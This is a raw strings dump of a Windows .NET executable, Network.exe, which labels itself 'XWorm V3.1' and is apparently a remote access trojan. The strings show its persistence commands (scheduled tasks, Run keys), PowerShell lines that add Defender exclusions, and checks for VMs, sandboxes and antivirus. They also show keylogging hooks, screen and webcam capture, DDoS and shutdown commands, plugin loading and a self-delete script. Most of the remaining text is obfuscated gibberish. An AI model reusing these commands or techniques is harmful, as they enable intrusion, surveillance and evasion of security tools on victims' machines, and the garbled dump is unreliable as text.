!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
py6YyZa5zCRM40
nZRrjWrRAAgdA0
rm6hyObpNY76B0
SlKwS7rvHGNMJ0
hJcMSQANoz0Td0
snkAscfOgLhbx0
V8gvP0Q9IjHqQ1
_Closure$__1
IEnumerable`1
ThreadSafeObjectProvider`1
List`1
uc9WmRwHpsrWc1
vDbrxb66PcJ9j1
OQa2QI674TQj02
zlvr8Eh6veXI22
Microsoft.Win32
UInt32
ReadInt32
ToInt32
NllpzN7lHpYT52
ZtEPycogHJp5H2
YTb1G5msQXmwJ2
lPvxG0YsybbtL2
Func`2
DMHrdRH15N1Mi2
y6UN4NYqxuYyp2
ZbL5O76awz0fs2
vMnY4eeeZXiw53
GimFDKLP4Yo7C3
6TBeaKs0X3izG3
3dZ0KzY0d1OHO3
FoQYZwZcrrzdU3
8sbKE3pTFSoYe3
0jSgGYg99RRPj3
0mSrM290cq6on3
IUJcRAmEg2S3t3
PjQ1nclzRXzx14
M06Q27fR4ph7C4
9qVd9vQfjE1VS4
axWapZCKuM8LT4
zhWhhqnsY4rLa4
YVbkWtQKTpHea4
fKxtqTbQDJPgg4
LkclRabyQim7i4
CuzX3SWa7qkIp4
hhURFFqG1uBLt4
VD8v0VkiUfmJ65
yFyiopsKfg5sB5
pI5JxJ2TkzpSN5
mip4ZoZWtF64P5
60H9GZlhA3y9T5
Dn5jCHYfivAad5
b0rfYvcqsEbun5
FiBBM0JhgIAer5
BlzPXkjVapnrr5
7fC1lW1coEhxw5
iCHsBW9tMA8Yz5
Pg8T7SNcapKF06
Rjb4IZQp6fYDM6
5CTlbdZ83qAzZ6
fVTkhxRbPWo0d6
4bg3goYnjTYxe6
oWDmm4I0x5zP27
F6HjQrKO0zH337
uaMm8XHrgia3A7
spD1ikKaJU3jA7
4vKdMuvZhfEpA7
DW3lP3jFYyj6E7
klO0qVhJrh2zW7
eFWlVhqLgYk0Y7
4fbvTzvGhgv9g7
Fulu0gB1UXPog7
XhJAJieETIPfs7
E2neBgfvg3mKx7
b8JayqXwfNwM08
b7Qfj8DAU1b258
get_UTF8
gJxwP0yQpmt1H8
BLTTM3NvfztFH8
3Pd1JeOnK7UwO8
xTN1vskSN8CuT8
_Lambda$__8
BpLG6tvygO1db8
sdFBpYXr8SnNc8
2r8yobKy09g3k8
rqZPVqpN0hSfk8
t4tmdnHaLmy7o8
9022Zt75rf53s8
Xhe4BclCzy6DA9
JXdDPyO1iZ1nA9
i9VjRGEpbsI2S9
xG9Jp7bxDS1Bg9
Zldt46XOpMLJi9
ooia4BdEZnMiv9
<Module>
jlVhYlXhhehz3A
O2dxPclGVomGHA
ilc5dEkYMNkLJA
UNlVxx3fCSZqOA
K0pAQAYCCrUBPA
i0tWIbw5efUSUA
7zicunfpS67iVA
dWSxkZ96RD0mVA
QxcP3FkGEqvKXA
Pvbg5Q8cn2WOXA
capGetDriverDescriptionA
bXd2Bke4DPgVuA
capCreateCaptureWindowA
Q8nuw6HeMPu0xA
6kJ5sXQq1pCb9B
zTSqDPyfx8GQTB
vL7ZKoviqRBMUB
4Lp1ZBG1XaEPVB
4K71QjB24PEOeB
qRrC2dMUk3UhkB
4Gb3cBbqU94XrB
IixN8xpgi98C7C
n2B0kjsP4oumAC
X6A4ROlyuo7sWC
OIhVGzuB45MDbC
pg9vtBLMxy60fC
hebwZ1UvbOzggC
ryOzFPGs7o3wmC
Ecm3KQ2L4S4czC
IXEMUvD981WZ2D
u97XwVCIB08x5D
3nPkV2pjqjG99D
CAYRrrZDebwiBD
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
ZCwQooQs4cm9aD
poR92tCyhqAlsD
vBSn4RXvDM4TvD
YvSdlLxoTYHTvD
cZLEITUXQ0KBwD
nsVs6TUCe2FH7E
blFnHSUUJOph9E
Zl4AG14pqj16NE
eAHYMd4codBIRE
EXECUTION_STATE
V03emBp45ekqTE
0JWQdxN01kHzXE
BFnMeQxfsUu5cE
G3dCbqvgZ9BX9F
4gGD0Xd7iaGWAF
NJl3xEGSX83FFF
VVtOTzlHnWuhMF
ORHkpRj9GpDKNF
o6j471zA0QgoVF
rXvcpZnQf1VCbF
vPpgIq1dD6PZqF
eR6GUBvIxdFOuF
jyoZ7zsQfkXAAG
8ssASEEUGZhxGG
imixEmMuaoWRJG
UvyDySxebCfqKG
zm8Wscq0BtNfPG
5DXK2iUioIN0VG
wm5tCsvaZPiMdG
9xStt2uoauUqhG
CPM6bFNcglXvmG
6IY8n4yrNH0osG
ewoaozkDytiQHH
qoRFe9reYKOqOH
xIWQKOiYwjHPYH
KqynntRw0hV5aH
mlo7VGGHGGUReH
VRa8AoQq0syaoH
Z9LPkiD0jQndsH
iaGlEhDZ56OXzH
TjQkiILuz8Yb4I
8voU69IGMrk35I
F1j9KtICIh185I
XZBZunphl7ME5I
tuPLKI6iu2Tx9I
pKVf9PNrDbY8EI
get_ASCII
oJQwH9tUwHWuJI
lQrFeZG8XZe7OI
AbtZzLonDWJKkI
YMjpEnfjjEN72J
YA9YilBeu1MlIJ
wkGFOdGzVX7NLJ
AMg8AkSSdQJANJ
IrvZ1Km8utpLVJ
ausk0kVw4PQEgJ
Ode4o17Ip06QhJ
AEs0bs0Tz74qnJ
7KBiGd7aL6zToJ
f8WaKfETVXQKtJ
BEjaDihQIpITxJ
Jqg3aZLVGSL6yJ
bf0FG9DnnaZ27K
VYooBhJzFuELFK
6VsAc0IVo1HgFK
1oQvmbVljRLGLK
Nmhlud2TdSb8NK
Q70sAt7zayhKRK
tslPEmk3H4NxVK
T1CSaCtD8NKPcK
0eb7MXEo4GfceK
JJqDVrBd7RtQoK
Y9LWizqROY3NxK
LDM3YjyJRZo01L
WuBjiCkqYuH32L
ocJcPAIAg4joBL
A0pGemq4lr7REL
MFDPlJMdUzKKUL
7j14ftscyd7AZL
cnKa6kzNjkWXcL
lTSPmDuOnuwmfL
3t3a08Lh3mSyjL
ArPhVl5m5KMIrL
3k0CP7A3zVx9vL
C0KE02AxcxSi8M
Znb1GMGJ4wddNM
g31cbwzSpzjUeM
9ipqk6ainFQVfM
MS404F4mP7HkjM
wE8I3tpGlXQuoM
XKD5wKm7b8jhvM
xpbIgtxCH4jvyM
rDyHnLJLriKmIN
sBF8pHHTiy3gPN
5MRjzg0YMRicWN
2yWKaEIKcPqmYN
8cC5qmiq9Ha29O
8Je1r7LzdYODEO
LASTINPUTINFO
System.IO
rYZiE7aulvqLJO
uUF2zDiYCMerSO
6tzMgfaQj5d4YO
vrNxKtS15eD7eO
9hDOiEW2mQtNfO
EWrs4tnTiDj1wO
Ys80t6gcAIRSwO
2TgzYgut4QbT0P
7rqFH8fHakf24P
Emv0ysdVwPJBGP
azCWdy7vH7alHP
zdWtaBNDmht6IP
l3onIIw9Xs8YJP
hTbNIU8eDqLALP
6UsLcNV0i4GjZP
wAWAfN3chmDKiP
ns4NgGBuEnVHvP
dmWK70uHsIFvyP
qSXRtXYxKM3IzP
5GpGITaFrlmW1Q
WSjZjz70Gark7Q
MPnhbg3OQ1opCQ
hptP5xxKiTuNSQ
5gOZHXBXuKycoQ
HV5U1BFsiOcbyQ
OSvS7tjgC1xECR
pCjZsxBDSQiyFR
ezL3LiijHEDjIR
BJ2ympOCczNFRR
5pPG2pIf95efVR
6cniE0VKdYt8jR
dmXTrye9GaDcuR
EecpJngSOm5xwR
eMCDuaTUTSesxR
9bmEMhRu5asbCS
tv0s5n8kWr9gDS
iKspxE3MT6FOFS
DwLugLbIJuxYFS
X42ElGF9frD9IS
BdAiYToRfzEmKS
kxHORf8IX5y4TS
XJXo6OOWDpDLTS
ES_CONTINUOUS
cvziS0jsVjzpWS
qBy4B3ltaTSkkS
9TJCAqglr6LN6T
UTdAIIP4radnDT
Yi1hwAzFTZV2PT
st2h0ETHMmAyQT
LFAKF9wVZCchlT
8HokS19nOYRcoT
iTCEyOqeLha1yT
jbiP7srv8ZbP7U
2xEVNVnrWCLxTU
T1qcSQQjbJiYwU
NPk8lxmDZnM0xU
ntILtJJL2IsdzU
IjkZxyUhPtTe4V
YmJfMUjZzF4fNV
pIqT7ONHWNd7PV
051pFLalzFNlcV
wrGbHd1N79GZyV
Hd0fGjfbzuVp0W
RkgEJGHleV2UDW
C3anlCQmsrb5GW
IZv4rTJADA5OHW
SzGerhBo2pc7LW
R1D91SHCs4m2OW
G8Ov2i1BglLLWW
ikE4inmqqHuThW
kn73wtQgSCnCpW
WZOcgBYC6APwyW
rDvDPPA2lFjr4X
Z6mx0CUzQsKW7X
WahIPVyXazRREX
qdAA6Dn99yZrOX
aDr09QyUdW82qX
1fqO1dnqDHfbuX
Le32v7Zh8ra66Y
oLB76bGcnVr89Y
cxVRVuviLqecBY
KvXlqvQYrIUNIY
MWjGOdjqHJgkSY
A0D7A1StyKYfZY
jPCjBn2Fkns3jY
2QCJpw0fguSj9Z
WGlzIYrU6SqEEZ
xpCd0GkwNyaWEZ
WzPH4URalczdPZ
Zp736h0E8MDimZ
Dispose__Instance__
Create__Instance__
value__
bgxelQuzEZwFCa
rBADo88MpQRsUa
lRaKkpma3rLXWa
hZVODrmjPr8jWa
uJ5hZbRPYXXqba
ProjectData
zbKErwb6eHXuHb
YL4RG7ffX2oRUb
0RGzjF9vw3QRab
mscorlib
vQHnTfWb8mQ4jb
1A2hgQXQxXaykb
e6vG7KeG2kP5Vc
System.Collections.Generic
Microsoft.VisualBasic
JfyFebH7oYUzkc
LowLevelKeyboardProc
dWQ2tnFMFOtIAd
v0HuDYFlQ5XFDd
GetWindowThreadProcessId
GetProcessById
8WGxcav0SriKLd
PnHRwBpgazObSd
GCiranRkf1v0ad
Thread
RijndaelManaged
get_Elapsed
NZOhqK6piz8jmd
EndSend
BeginSend
Append
RegistryValueKind
UBound
set_Method
CompareMethod
TargetMethod
mMqW9aYqJrYUwd
HEwgH7k66R811e
BabkJPx2gE8I8e
S5ichvdjZX6LFe
jr8knc4FnkOnGe
Replace
IsNullOrWhiteSpace
CreateInstance
get_GetInstance
instance
GetHashCode
set_Mode
FileMode
EnterDebugMode
CompressionMode
CipherMode
SelectMode
FromImage
DrawImage
get_Message
EndInvoke
BeginInvoke
IEnumerable
IDisposable
get_Handle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
EventWaitHandle
Rectangle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
AppWinStyle
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_UserName
get_ProcessName
DateTime
get_LastWriteTime
dwTime
WaitOne
WriteLine
get_NewLine
Combine
mZGSxXZbKsgsoe
ChangeType
CheckForSyncLockOnValueType
get_DriveType
SecurityProtocolType
GetType
SocketType
System.Core
MethodBase
ApplicationBase
HttpWebResponse
GetResponse
Dispose
Create
MulticastDelegate
DelegateAsyncState
GetKeyboardState
EditorBrowsableState
SetThreadExecutionState
GetKeyState
Delete
ThreadStaticAttribute
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
HelpKeywordAttribute
GeneratedCodeAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
HideModuleNameAttribute
DebuggerStepThroughAttribute
AssemblyTrademarkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
MyGroupCollectionAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
DebuggerDisplayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
WriteByte
m_ThreadStaticValue
DeleteValue
GetObjectValue
GetValue
SetValue
set_Expect100Continue
EndReceive
BeginReceive
Network.exe
cbSize
get_TotalSize
set_SendBufferSize
set_ReceiveBufferSize
A4zxbNAJNkwG0f
L1jAEfba0eNjCf
SizeOf
0iqb1Qf70ArWof
SvcSNVWf7FReof
iRqTuad7iSUe1g
GJB1Acig60bb4g
SxyOAbvU67MO8g
jc0Z52ZYGKYj9g
86cHts9Hu7C6Jg
KamTAdGgLGo7Zg
get_Jpeg
UrB29aYUcFyigg
fZtbtZDs99cYjg
System.Threading
add_SessionEnding
NewLateBinding
Encoding
System.Drawing.Imaging
FromBase64String
DownloadString
CompareString
ToString
GetString
Substring
System.Drawing
ToLong
set_ErrorDialog
LXbcEXrqlll14h
NXlliwHVQOiC5h
J1m1RylStiUX5h
d2iA04cdnyVpBh
SGKGKw5opucEGh
PzyL3FctrgAWUh
YRdB6Gj9RzHkbh
Stopwatch
dgxDO6a3TJ6vdh
KCaARxkPSunDgh
OJOnLEJnwPfvkh
ComputeHash
get_ExecutablePath
GetTempPath
get_StartupPath
GetFolderPath
get_Width
get_Length
EndsWith
StartsWith
ANmVLGuMg2391i
ltAMTlM7M0PfAi
zLv62pbYl9Acfi
H0Qq5H7Q25udfi
ludSEqv26VDgri
7awBLWIka82axi
DJTTvf5qWGHWyi
j9ltgdXBNcjHAj
KdYVTDES68iCDj
qwACHJF2sdvDJj
vIu3ZQ5SO6UQJj
sXNPkE7TuFPOOj
JnrsCuazGHWgUj
zeuyP3PBgrG8Yj
MbZugNU6CDv4Zj
KBYfpZj3PBZzbj
8PRfLHFBxPFrgj
G8meqG4rkzT8sj
OTBJ9palmJUWtj
OM1u7JJKtgghxj
7dW7ZuylRkJ01k
YhXjHd3glzvj2k
1QLLpaJNy1dD9k
oDMhvy44SgzIEk
uKVO9M95ySTpKk
9HCL8e4XSJQuLk
get_ServicePack
AsyncCallback
DelegateCallback
TimerCallback
WaitCallback
RegistryKeyPermissionCheck
TransformFinalBlock
MpxZv7amQJNcgk
qv36vo3yRb6qik
ak9eSY5TsUGejk
Network
cBARgxFuuEMrzk
fHkeO5aVF2l16l
eAEkKHcFBxnECl
Ujl0Oh4ALSSbCl
VhV8UMYygmRzJl
RtlSetProcessIsCritical
Marshal
System.Security.Principal
WindowsPrincipal
ConditionalCompareObjectEqual
System.ComponentModel
6OLXWsPHvc5dgl
LateCall
kernel32.dll
avicap32.dll
user32.dll
NTdll.dll
yaQktPZSWiDvnl
set_SecurityProtocol
ThreadPool
ObjectFlowControl
vX5Cq0a3joRBtl
ahdUhDbQUWdAul
oD5ciL3jkYUg8m
hUvrQQcjh9qnXm
FileStream
GZipStream
MemoryStream
lParam
wParam
9qnpnbIYcLxMcm
get_Item
QueueUserWorkItem
get_Is64BitOperatingSystem
SymmetricAlgorithm
HashAlgorithm
Z1fwAsDOam44im
Random
ICryptoTransform
czm5YUC4glxxAn
yVA9nKysqoWOIn
ww5JsTPTvFoGUn
CJSwaPQtv0UYUn
s4C7g4uDOHh4Yn
ToBoolean
op_GreaterThan
TimeSpan
CopyFromScreen
get_PrimaryScreen
System.ComponentModel.Design
AppDomain
get_CurrentDomain
GetExtension
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
Information
CopyPixelOperation
Interaction
System.Reflection
ManagementObjectCollection
Exception
Environ
SocketShutdown
M4KVssjjWnUkxn
R5KCEpexPx7H2o
p7tmYiVz1Ke7Ao
gnkriNGjFLBMLo
EyMMus2gUI9FQo
87m94ZGI835jQo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ParameterInfo
ComputerInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
eOLsLgvxARYtko
Qy4cZGJX7Edtso
KsXPo2BmFWZPwo
99DYKayaYBp7xo
whK1KTSKbALYxo
M3S87N8sRez4Dp
cZUT983aobVGXp
Bitmap
pQLQstqgGeEpbp
tZAY4pmbHEOgip
zE3eUZauFYMPmp
rsSJgxkpOwHaop
DWRucuOZweItyp
yBnzDGkUNUcKzp
frhZ4qMqBY8J1q
rAjRl0uozEFCBq
BCJET1OWYVmDIq
GNjhte7tcVUzSq
ermqiFHRfoscTq
System.Linq
01FssdduDWwEoq
XuY36FKnl0ahuq
L6ylqPhoE9yqBr
9im15dTbEB1gSr
F9GZKasMlBqVTr
33XV5vocteH4Xr
xlO4cKbgO35zZr
MD5CryptoServiceProvider
StringBuilder
SpecialFolder
ServicePointManager
ToUInteger
ToInteger
ManagementObjectSearcher
SessionEndingEventHandler
System.CodeDom.Compiler
ToUpper
get_CurrentUser
StreamWriter
TextWriter
BitConverter
ServerComputer
ToLower
GA3moJu8aHyunr
CreateProjectError
ClearProjectError
SetProjectError
IEnumerator
ManagementObjectEnumerator
GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
Ge0EUMACPn4Z5s
kEQEAaDSgBIKOs
Graphics
System.Diagnostics
FromSeconds
get_Bounds
GetMethods
Microsoft.VisualBasic.Devices
MyWebServices
Microsoft.VisualBasic.ApplicationServices
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
Microsoft.VisualBasic.MyServices
GetDirectories
ExpandEnvironmentVariables
GetFiles
GetTypes
GetProcesses
FileAttributes
SetAttributes
ReadAllBytes
WriteAllBytes
GetBytes
GetDrives
V1xSuhI65R0Kfs
SocketFlags
Strings
SessionEndingEventArgs
lnDh4AY9wNAShs
uJ2SHBe2OYcvjs
Equals
System.Windows.Forms
Contains
Conversions
System.Collections
get_Chars
RuntimeHelpers
GetParameters
Operators
GetCurrentProcess
System.Net.Sockets
set_Arguments
SystemEvents
Exists
tV5uVcBHXSMI2t
qVxNbk4VxvL66t
wGuKozF9Pkti6t
NB3K9jpy1scDDt
veDmeM0wXlO3St
jTOGDRJoqWulWt
Dymx7DFmeq6nXt
OJ6xzghGsvn2at
Concat
ImageFormat
PixelFormat
AddObject
ManagementBaseObject
CreateObject
ConcatenateObject
SubtractObject
TargetObject
NotObject
Collect
Connect
set_AllowAutoRedirect
LateGet
LateIndexGet
System.Net
Socket
lsDimVCCXcyxft
get_Height
op_Explicit
set_DefaultConnectionLimit
GraphicsUnit
WaitForExit
get_Default
IAsyncResult
DelegateAsyncResult
DialogResult
Y535EpOXlDoylt
ToUpperInvariant
set_UserAgent
WebClient
System.Management
Environment
get_Current
GetCurrent
CheckRemoteDebuggerPresent
ManualResetEvent
get_EntryPoint
get_TickCount
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Restart
Convert
$VB$Local_Port
FailFast
HttpWebRequest
$VB$Local_Host
set_Timeout
GetKeyboardLayout
MoveNext
System.Text
ReadAllText
GetWindowText
tkR8f3F162rOzt
G7tCID4OB7gj7u
eTewlNKMyBrOMu
E2hFsi8EQklvMu
7VvPwVpG9vInPu
Rugtwk9QFZTfXu
0LJCTHXpxtFbau
lyDMFaIwPPjHgu
gAuJJu4OBuOq1v
zqZbrq1LvvYZ5v
s9r9SLdvIMZZBv
FwKGb0ycjBiMCv
iRbVS3XhZ3AAGv
U7ULy0FHvVJPjv
qqWDGxJ2H1Y9mv
BnFV0OnGczCuvv
Ye7lpg08PVonwv
EXB1yD4u2azU2w
EAbvMzUHSuKX9w
w2Prpa2ludSmCw
t3cRIRMd8GYLFw
Pg9JeX1LoKeMXw
gRw8JGtjWyl3gw
GetForegroundWindow
set_CreateNoWindow
r1McM5ESZwoWpw
1EvaswrJWMESyw
MLwRHmgiTXg1Bx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
QyrNv3G7b10iRx
DuVMHbLqZ7F7Tx
wR0IiFm8eo8Cbx
LateSetComplex
MessageBox
vr7VAhx7JSCOxx
iciM1RfJEViq3y
K7CLTJF74eNI7y
taDhZJt5fwpxCy
8VK5x6wMycwFTy
ToArray
wPn0LINB9DEQby
get_IsReady
set_Key
CreateSubKey
OpenSubKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
get_SystemDirectory
get_Registry
op_Equality
WindowsIdentity
IsNullOrEmpty
RegistryProxy
cdaOPYq6f3294z
mmY7ZyZ3wyJ16z
cC5HVhbbof62Iz
IFJEDL2tqlzjIz
wbDVfv9A6amQYz
BWhtlMI5XbVhcz
aC3jdJ8tJHyTlz
WrapNonExceptionThrows
$6c7118f9-4f5e-4e24-815e-390b764009ec
1.0.0.0
MyTemplate
14.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
_CorExeMain
mscoree.dll
-+Ap^4
Y{P|@=
OB^r_BJ
C)&2p,V
q&.G6j
h z1g_j
X,\pIZR
2aSZvR
bNlZ5Zi
lb&cV<
D|_4VS
H8nFz5
2gI)rAVu
KIW$d7R
>!Pk;I
#Z'J{6
v;J}f:6
\qm3p>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
SkccePmYc0ueOS
8XdBDqaLM1QRM5
m9nSAcDGy9cE9Z
hqSgPLF9eVADQe
QExmjTcS1lA1j6
mRre5tIQC4C9QL
sIm27QDYPwmRSD
4dMMlxYju1ElEh3VsiKnbw==
/XVy3+tbEPt0mwEJF/TeZQ==
HUqu91D/E6QfrUSZH7PYYA==
kJP4Cmv1piTKYPTyB2TOOg==
w2ziozj8n0lFRFzRhIB2EA==
%AppData%
XPXGpRpWuWG4G5uo
\Log.tmp
SVbbKt2EfgZJIG
JmTZKaFmGVzCrs
schtasks.exe
/create /f /RL HIGHEST /sc minute /mo 1 /tn "
" /tr "
/create /f /sc minute /mo 1 /tn "
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WScript.Shell
CreateShortcut
TargetPath
WorkingDirectory
powershell.exe
-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '
-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '
http://ip-api.com/line/?fields=hosting
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
XaAO4QV7RmKG7n
tZ5CQypqotRMCA
CeIQpvT52WtXdT
2OkI1J74OAv2gj
dXxRfySZGeYxid
Oa9GhQY0cY39hp
6Gc88hv1dG1BWh
SHXVyYJYmIRpQ7
cVI2AVHRimmEU3
cht6QwMdh53VU3
E3MysDR8osnnn0
Qdt2RjYj6exEq1
pIGhK19SxF8UfR
iZOEusNAcfbWBj
Microsoft
Service Pack
XWorm V3.1
dd/MM/yyy
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
f2iIa81NUZytRm
aEqUsIqrHYFyIh
kKpY6yZAsdW4PL
WLQeFBih3XYvip
t9HdI5gzBc6nIR
WPXNbJFWNdgvbF
nE0nAShxQOXhRl
B5Cpu71cnYFrKP
Q3HgPj0jcyfpa7
wcDhx3kVLNStam
rNsIU6azwEjsMu
laFXVWcyqYZyk3
os01BJGnMh3AjH
ohlfydRu7PmXOL
k9GN5HKILxVwW1
1kro77P2XmTbMz
uninstall
update
Urlopen
Urlhide
PCShutdown
shutdown.exe /f /s /t 0
PCRestart
shutdown.exe /f /r /t 0
PCLogoff
shutdown.exe -L
StartDDos
StopDDos
StartReport
StopReport
plugin
sendPlugin
savePlugin
OfflineGet
MessageBox
Plugin
Invoke
RunRecovery
Recovery
RunOptions
injRun
UACFunc
ngrok+
Plugin Error!
ToLower
Open [
-ExecutionPolicy Bypass -File "
jXP332rDA6kLW4
8dcJgrYx4m1BMt
4OIsBZuboGSu8u
jolEfwfDwYHze3
KTp3EXZqLTjMbs
KSgxdvMsK8rGRA
CCsBrWHe3Osk2h
JTZDG3nQVyEm48
PLEYR5EjCXGjGL
vKqHlBlwfCFY92
0vzwXoMrX1Uumy
0GsxOOQpS3q4tg
Mvi8rCy3bQQgZp
CakT7ZUpCBBAxT
2DfphhxnPc5pwp
s2cC0vMImUTIT9
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
schtasks
/delete /f /tn "
attrib -h -s
*.* /s /d
@echo off
timeout 3 > NUL
" /f /q
ek8SrNhQAMSCzc
nPQNKCVSKW38VG
wscript.shell
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
ShowSuperHidden
windowstyle
cmd.exe
Arguments
/c start
&start
& exit
regread
HKEY_LOCAL_MACHINE\software\classes\
HKEY_LOCAL_MACHINE\software\classes\.
\defaulticon\
IconLocation
iconlocation
arguments
&start explorer
HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\
FJ1Ges9QJDNFgR
75CitiSBC8IrUN
wK9C5R9i7dWVT4
Tk7OqhSiVsRSds
ToUpper
[SPACE]
Return
[ENTER]
Escape
LControlKey
[CTRL]
RControlKey
RShiftKey
[Shift]
LShiftKey
[Back]
Capital
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
MainWindowTitle
ProcessName
Q1MdPljISxUPTC
ZqVNKPfJ0KGl2K
Q9j6u3eGWTtgsJ
jPCqq3xOQJuBR2
3YP5j3qSsl4XuD
Zx1CXTU2Q7ppha
cD80SYw3O2VpOP
5cWsOwGQEQxjx4
xkSaGOnltsOoaN
pJfj2FxtS2ZdoH
sgObnf4SmqdgB8
uAKrlyvn8wcnWA
hETrecKXSx9uYH
dZqRSLr5tGqIMJ
JviMfrAoXP6VUi
9JibEz5Ot39rfN
tz5I3XIeGfUwvi
z5UzRmGp55ZojA
R6VmwYEAFCQyfn
uSnsKEk6YH80DC
66fGkrFkvPNEB6
zI44mNKOk485FQ
gLybaT6nFGew4y
QJA9Q2aq8AsEOA
9cIuDjFmf0Ndv5
K4RPaWcjnSo13y
QxWeCw8nnJsJKu
Software\
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
abcdefghijklmnopqrstuvwxyz
Err HWID
ToArray
AHAyxoXrA9o4Vi
dVPF36AljY1v7c
0gdM8UP22hprNM
QVXVDL7qEEcJfh
hxwr9My0hyldx1
HDONx9CvK7zyPl
DNhumTRWk71Yq8
ceZdrPEDtueGnC
iwDzZJVhRk1ovB
WsSEOd05C0a599
YfyUuxD4RI82ww
4PupKua2SJPU2H
JrblTRLFbddifY
5eVDfNwopF4Yrl
fhRXW3wML8Wmcf
29OhWZs9mivZpc
O2hkVhIgV8E0sA
2hEtBL1RXmgLsv
utEhYkVPYDtA5D
KHiku1IVOHCHWZ
bf4LKimgNmOYGb
0gOKTDcHWPlP4d
86vsUyHV2JSAr4
qkb1SfVICAEu2A
ML2UnhjbRhSYsO
XDrxG5KvaEsSL1
abcdefghijklmnopqrstuvwxyz
INTERNET-SECURITY(
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
Network.exe
LegalCopyright
OriginalFilename
Network.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0